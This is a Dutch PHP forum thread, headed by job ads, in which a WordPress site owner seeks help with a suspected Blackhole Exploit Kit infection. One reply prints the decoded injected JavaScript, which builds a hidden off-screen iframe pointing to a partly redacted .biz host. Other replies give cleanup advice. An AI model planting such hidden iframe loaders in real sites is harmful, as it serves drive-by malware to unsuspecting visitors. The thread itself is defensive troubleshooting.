Blackhole Exploit Kit

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Fullstack Developer TOTO

Do you want to work with the latest technologies on the development of new systems and applications? Get moving and strengthen Nederlandse Loterij as a Fullstack Developer TOTO. Thanks to your efforts, complex business critical applications are always running smoothly. In this way, you directly contribute to a happy, healthy and sporty Netherlands. As a Fullstack Developer you score by: Taking ownership of the development cycle of an application in a large scale, high availability, geo redundant landscape Coaching your peer developers and safeguarding code quality Integrating the application with other components of the system using the available API’s Managing

Bekijk vacature »

Senior Software Developer C++

Vacature details Vakgebied: Software/IT Opleiding: Senior Vacature ID: 13342 Introductie Do you want to work for one of the most innovative companies located in the region of Eindhoven. Currently Due to growth we are looking for a Senior Software Developer. Our client is a high-tech company with international roots and can provide you with a challenging opportunity. Functieomschrijving Responsibilities: Design, develop, and maintain high-quality software applications in C++ Collaborate with other engineers, product managers, and stakeholders to understand requirements and develop solutions Write clean, maintainable, and efficient code Conduct thorough testing and debugging to ensure high-quality software Optimize applications for

Bekijk vacature »

PHP Developer gezocht!

Functie omschrijving Wij zijn op zoek naar een PHP Developer! Ben jij op zoek naar een nieuwe uitdaging? Lees dan snel verder! Voor een organisatie in de regio Utrecht die zich bezighoud met het verbeteren van de medicatieveiligheid zoeken wij een Software Developer. In deze functie zijn wij op zoek naar een slimme en enthousiaste Developer die interesse heeft in farmacie, logistiek en ICT. Daarnaast beschik je over een goed analytisch vermogen en ben je van nature gestructureerd en resultaatgericht. Je moet in deze functie daadkrachtig, flexibel en communicatief goed zijn. Je verantwoordelijkheden bestaan uit: Object georiënteerd programmeren; Werken in

Bekijk vacature »

Android developer

De functie Schiphol is een plek om te reizen, te verblijven en te werken. Door middel van data en technologie richten we op al deze gebieden het leef- en werkklimaat optimaal in en zorgen we voor een slimmere en efficiëntere operatie. Wij ontwikkelen nieuwe producten en diensten vanuit de wensen en behoeften van onze klanten, voorspellen passagier flows en testen digitale oplossingen om rijen en andere pijnpunten in het proces te verminderen. Met slimme feedback van sensortechnologie maken we zelfs data van toiletten en stoelen inzichtelijk en bruikbaar. Het Commercial Platform bestaat uit multidisciplinaire teams met een end-2-end verantwoordelijkheid voor

Bekijk vacature »

Traineeship Full Stack .NET Developer

Dit ga je doen Start op 7 augustus 2023 bij de Experis Academy en ontwikkel jezelf tot een gewilde Full Stack .NET Developer. Maar hoe ziet het traineeship eruit en wat kun je verwachten? Periode 1 De eerste 3 maanden volg je fulltime, vanuit huis, een op maat gemaakte training in teamverband. Je leert belangrijke theorie en krijgt kennis van de benodigde vaardigheden en competenties die nodig zijn om de IT-arbeidsmarkt te betreden. Zowel zelfstandig als in teamverband voer je praktijkopdrachten op het gebied van front- en backend development uit. Wat er per week op het programma staat kun je

Bekijk vacature »

Ontwikkelaar MS Dynamics 365 Projecten

Samengevat: Deze werkgever is de kwaliteitsdienst in de tuinbouwsector. Ben jij een ervaren ontwikkelaar? Heb jij ervaring met Ms Dynamics 365 BC? Vaste baan: Ontwikkelaar Ms Dynamics 365 BC ICT MBO 3.500 - 5.000 Ontwikkelaar Ms Dynamics 365 BC Ons bedrijf bewaakt en bevordert de kwaliteit van producten, processen en ketens in de tuinbouw. Wij kenmerken zich door openheid, ruimte voor initiatief, collegialiteit en zelfontplooiing. Deze werkgever is een veelzijdige organisatie. Je werkt voor de eigen IT organisatie. Zij werken met moderne technologie en staan open voor innovatie. Functie: Voor de vacature als Ontwikkelaar Ms Dynamics 365 BC Roelofarendsveen MBO

Bekijk vacature »

Embedded Software Developer

Functie omschrijving Ben jij een Embedded Software Developer die affiniteit heeft met de allernieuwste technieken? Voor een mooi softwarebedrijf in omgeving Gouda zijn wij op zoek naar een Embedded Software developer. Binnen deze rol houdt jij je bezig met alle werkzaamheden die nodig zijn om een functionaliteit te bouwen. Denk aan ontwerpen, architectuur, programmeren en algoritmes. Je voert test en validatie werkzaamheden uit bij de implementatie bij de klant. Ben jij enthousiast en een echte team player? Lees dan snel verder en laat wat van je horen! Bedrijfsprofiel Onze opdrachtgever bestaat uit een groot aantal creatieve en ambitieuze ontwikkelaars. Ze

Bekijk vacature »

Database Developer

Functieomschrijving Heb jij ongeveer 3 jaar ervaring als Database Developer met MS SQL of een vergelijkbare database? Wil jij werken voor een gewaardeerde werkgever in regio Tilburg waar jij de tijd en ruimte krijgt jezelf te ontwikkelen? Lees dan snel verder! Hoe ziet jouw takenpakket eruit? Je houdt je bezig met het creëren en bouwen van MS SQL server databases; Je gaat projecten vanaf het begin tot het eind begeleiden. Je sluit aan bij meetings met klanten om hun processen in kaart te brengen. Vervolgens voer jij het project uit en zorgt dat dit zo goed mogelijk verloopt; Je werkt

Bekijk vacature »

Medior PHP Developer

Functie omschrijving Ben jij een getalenteerde PHP Developer en aan de slag in een gemotiveerd team? Lees dan snel verder! Voor onze opdrachtgever in de omgeving van Valkenswaard zijn we op zoek naar een ervaren PHP developer. Jij gaat hier zorg dragen voor het optimaliseren en up-to-date houden van de bestaande applicaties. Je werkt verder aan de applicaties die jij verder ontwikkelt. Dit doe je voornamelijk met PHP en MySQL. Verder ga je je bezig houden met: Het uitbouwen van het E-commerce software platform. Deelnemen aan overleggen met het team. Het ondersteunen van jouw team developers (3 man) en helpen

Bekijk vacature »

.NET Developer

Dit ga je doen Tot jouw takenpakket behoort onder andere: Webapplicaties ontwerpen, bouwen, testen en implementeren in .NET/C#.; Ontwikkelen, implementeren en beheren van maatwerkapplicaties; Onderhouden en beheren van standaardpakketten; Onderzoeken en beoordelen van nieuwe technieken. Hier ga je werken Als .NET ontwikkelaar kom je te werken bij een grote semioverheidsinstelling in Nijmegen. De organisatie staat garant voor het leveren van onderwijs en les- en onderzoeksmateriaal voor duizenden betrokkenen. De organisatie wil bijdragen aan een gezonde, vrije wereld met gelijke kansen voor iedereen. Binnen de teams hangt een open en collegiale cultuur met veel aandacht voor een prettige en sociale werksfeer.

Bekijk vacature »

Junior .NET developer

Functie Als junior .NET developer begint jouw dag na een bak koffie met een stand up. De vorderingen worden tijdens de stand up besproken en de doelen worden opgesteld waar jullie als team in de volgende sprint naartoe gaan werken. Onze backend is geschreven in .NET Core en onze Front-end in Angular. Bij ons ga jij dan ook Fullstack aan de slag. Jij wordt hier opgeleid om zelfstandig te kunnen programmeren en applicaties te kunnen implementeren. Er wordt op projectbasis gewerkt, dit bied leuke uitdagingen omdat elke klant een andere visie heeft over de applicatie die wij maken. Je gaat

Bekijk vacature »

Ambitieuze medior developer

Wat je gaat doen: Heb jij al een paar jaar ervaring als developer maar wil jij naar the next level? In ons NextLevelDev Programma helpen wij jou om de volgende stap te zetten: een mooi programma aan trainingen op het gebied van Java, hippe frameworks, Agile/Scrum, OCP-certificering en optioneel: andere JVM-talen als Kotlin en Scala; Cloud (AWS, Azure, GCP) Soc Of beter nog, wat wil jij doen? Binnen DPA GEOS zijn we dan ook op zoek naar enthousiaste Java developers om ons development team te versterken. Als Java developer werk je in Agile/Scrum teams bij onze klanten en daarbij kun

Bekijk vacature »

Java Developer

Functie Wat ga je doen als Java developer? Jij komt terecht binnen een informeel team waarin je verantwoordelijk bent voor de backend systemen voor grote klanten als Ziggo en KPN. Als Medior Java developer werk je in teamverband en soms individueel. Gedurende de werkweek zal je veelvuldig sparren met je collega’s voor een goede implementatie van de software. Ben jij een echte Java developer? Ben je geïnteresseerd in de nieuwste technieken en de laatste ontwikkelingen? Dan ben je hier aan het juiste adres! Eisen Wat wordt er van jou verwacht? • Minimaal HBO/WO denk- en werkniveau; • Analytisch sterk, open

Bekijk vacature »

Oracle APEX developer

Wat je gaat doen: Als Oracle APEX ontwikkelaar bij DPA werk je samen met collega’s aan de meest interessante opdrachten. Je zult je ervaring met SQL, PL/SQL, JavaScript, HTML en CSS inzetten om wensen van opdrachtgevers te vertalen naar technische oplossingen. Je werk is heel afwisselend, omdat DPA zich niet beperkt tot een specifieke branche. Zo ben je de ene keer bezig binnen de zorgsector, de andere keer is dit bij de overheid. Wat we vragen: Klinkt goed? Voor deze functie breng je het volgende mee: Je hebt een hbo- of universitaire opleiding afgerond Je hebt 2 tot 5 jaar

Bekijk vacature »

PHP Developer - medior functie

Functieomschrijving Ben jij innovatief en wil jij je kennis graag delen met jouw nieuwe collega's? Lees dan snel verder! Voor een leuke opdrachtgever in de omgeving van Roosendaal zoeken wij een Symfony developer. Of je nou junior, medior of senior bent, je krijgt hier alle vrijheid en verantwoordelijkheid om jouw eigen loopbaan te ontwikkelen. Je gaat je hier bezig houden met en inspelen op de actualiteiten van jouw vakgebied. Techstack: Symfony, PHP, mySQL. Kennis van Svelte is helemaal mooi meegenomen. Bedrijfsprofiel Al sinds '99 is dit webbureau actief. De kernwaarden binnen het bedrijf zijn integer, dienstbaar en deskundig. Je komt

Bekijk vacature »
Brainworx CC

Brainworx CC

14/03/2013 11:56:02
Quote Anchor link
Beste,

Ik heb denk ik last van een Blackhole Exploit Kit op mijn website.

Configuratie:
- WP 3.5.1
- Up2date plugins
- Premium theme *betaald

Ik heb diverse malen de .php bestanden doorzocht op een code die wijst naar een mogelijke oorzaak. Helaas zonder resultaat. Ik krijg zelf (en sommige bezoekers) met diverse antivirus guards zo nu en dan meldingen, van eem mogelijke dreiging.

Sucuri: OK?

web site: *url verwijderd ivm veiligheid*
status: Verified Clean
web trust: Not Blacklisted
*Cached results from a few minutes ago.

Security report (No threats found):
check Blacklisted: No
check Malware: No
check Malicious javascript: No
check Malicious iFrames: No
check Drive-By Downloads: No
check Anomaly detection: No
check IE-only attacks: No
check Suspicious redirections: No
check Spam: No

AVG: NOK?

*url verwijderd ivm veiligheid*

Kan iemand mij hierbij helpen informeren. Heb reeds de SQL en WP installatie eenmaal volledig opnieuw geinstalleerd. Dus waar dit precies ontstaat is mij geheel onduidelijk. Wellich in een file op de ftp dat geen .php is?
Gewijzigd op 24/05/2013 14:21:44 door Bas IJzelendoorn
 
PHP hulp

PHP hulp

06/06/2024 10:25:28
 
TJVB tvb

TJVB tvb

14/03/2013 12:00:53
Quote Anchor link
Heb je alle bestanden gedownload (via ftp) en met een virusscanner gescand?
 
Marvin H

Marvin H

14/03/2013 12:02:39
Quote Anchor link
Het zou ook kunnen zijn dat de hosting provider zelf is gehacked, zit je op shared hosting?
Controleer eens op bestanden die recentelijk gewijzigd zijn en check je logboeken op rare events (indien je hier toegang tot hebt)...

Toevoeging op 14/03/2013 12:07:58:

Ik zie trouwens in je broncode een raar script staan, het ziet ernaar uit dat je php files zijn aangepast...
Ik kan je wel helpen met alles te checken, stuur me anders even een PM

code verwijderd om exploit te voorkomen
Gewijzigd op 24/05/2013 15:19:03 door Joren de Wit
 
Brainworx CC

Brainworx CC

14/03/2013 12:10:44
Quote Anchor link
@TJVB, done en geen gevonden object.

@Marvin, die 1e line zie ik zelf nergens staan :S ik PM je even!
 
Marvin H

Marvin H

14/03/2013 12:14:12
Quote Anchor link
Bovenstaande 'hash' is de volgende HTML code... Duidelijk een injectie in je PHP dus...

Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
        if (document.getElementsByTagName('body')[0]){
            iframer();
        } else {
            document.write("<iframe src='http://.....biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730' width='100' height='100' style='width:100px;height:100px;position:absolute;visibility:hidden;left:-10000px;top:0;'></iframe>");
        }
        function iframer(){
            var f = document.createElement('iframe');f.setAttribute('src','http://......biz/tmpfile/node/questions.php?topnav=42&soft=633&oracle=79&virus=719&contests=730');f.style.left='-10000px';f.style.visibility='hidden';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
            document.getElementsByTagName('body')[0].appendChild(f);
        }
Gewijzigd op 24/05/2013 15:16:02 door Joren de Wit
 
Brainworx CC

Brainworx CC

24/05/2013 11:59:31
Quote Anchor link
Mensen,

Ik heb echt even hulp nodig nu... heb er diverse malen nu naar gekeken, maar alsnog geeft hij weer meldingen.

http://imgur.com/ucekepZ

Iemand die de broncode in WP kan na kijken voor me?
 
Bas IJzelendoorn

Bas IJzelendoorn

24/05/2013 15:25:56
Quote Anchor link
Voor de zekerheid heb ik 2 urls en gevaarlijke code verwijderd. Gezien hier bij mij me virusscanner en de spyware scanner begonnen te protesteren bij het openen van de pagina (op phphulp). Graag het verzoek even goed opletten met welke code er geplaatst wordt en geen gevaarlijke code hier te plaatsen.[/modedit]
 
Brainworx CC

Brainworx CC

24/05/2013 15:41:48
Quote Anchor link
Maar Bas ... is er ook iemand die mij kan helpen?
 
TJVB tvb

TJVB tvb

24/05/2013 15:50:17
Quote Anchor link
Heb je alles (ook verborgen bestanden) weggehaald en Word Press geheel opnieuw geïnstalleerd?
Alle wachtwoorden aangepast?
En heb je ook de access logs na kunnen kijken?

Eventueel wil ik er wel naar kijken (pm me dan de details) maar dat zal pas volgende week gebeuren.
 
Eddy E

Eddy E

24/05/2013 21:06:40
Quote Anchor link
Inderdaad, buiten WP om even een backup van je database maken (via PHPmyAdmin oid).
Dan alles verwijderen, WP nieuw erop zetten (van schone installatie) en dan database terug zetten.

Is misschien de enige manier.
En uiteraard dit aangeven bij WP, zodat ze het gat kunnen dichten.
 



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.